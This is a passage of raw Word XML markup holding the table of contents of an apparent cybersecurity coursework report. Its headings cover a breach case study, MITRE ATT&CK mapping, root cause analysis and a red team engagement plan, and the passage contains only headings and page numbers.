          <w:r w:rsidRPr="00874A6A">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="002060"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc215571125" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571125 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="441DCCF0" w14:textId="1CE75D50" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571126" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 1:</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571126 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="464BEB4E" w14:textId="03AF7C1C" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571127" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Strategic Threat Analysis – From Headlines to TTPs</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571127 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="698EF131" w14:textId="669321E4" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571128" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Case Study Selection: The "MediVault" Breach (Revised for 2025 Scenarios)</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571128 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BC7C72F" w14:textId="43690D18" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571129" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Adversary Campaign Mapping (MITRE ATT&amp;CK®)</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571129 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A311C82" w14:textId="128302F3" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571130" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Root Cause Analysis (RCA) and Control Failure in a Compliance Context</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571130 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="391F772D" w14:textId="05A5D8CA" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571131" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 2:</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571131 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="072BCBEC" w14:textId="62373A5E" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571132" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Red Team Engagement: "Operation IP Shield"</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571132 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="363AD6A8" w14:textId="20476EAF" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571133" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Campaign Design</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571133 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A49AE2C" w14:textId="66C02EFA" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571134" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.1</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Rules of Engagement (RoE)</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571134 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47AB77DF" w14:textId="590FA60F" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc215571135" w:history="1">
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.2</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F" w:rsidRPr="00A35B44">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Threat Emulation Plan</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215571135 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00917D2F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18226E18" w14:textId="05A22B35" w:rsidR="00917D2F" w:rsidRDefault="00FA1A6B" w:rsidP="00AB3F18">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
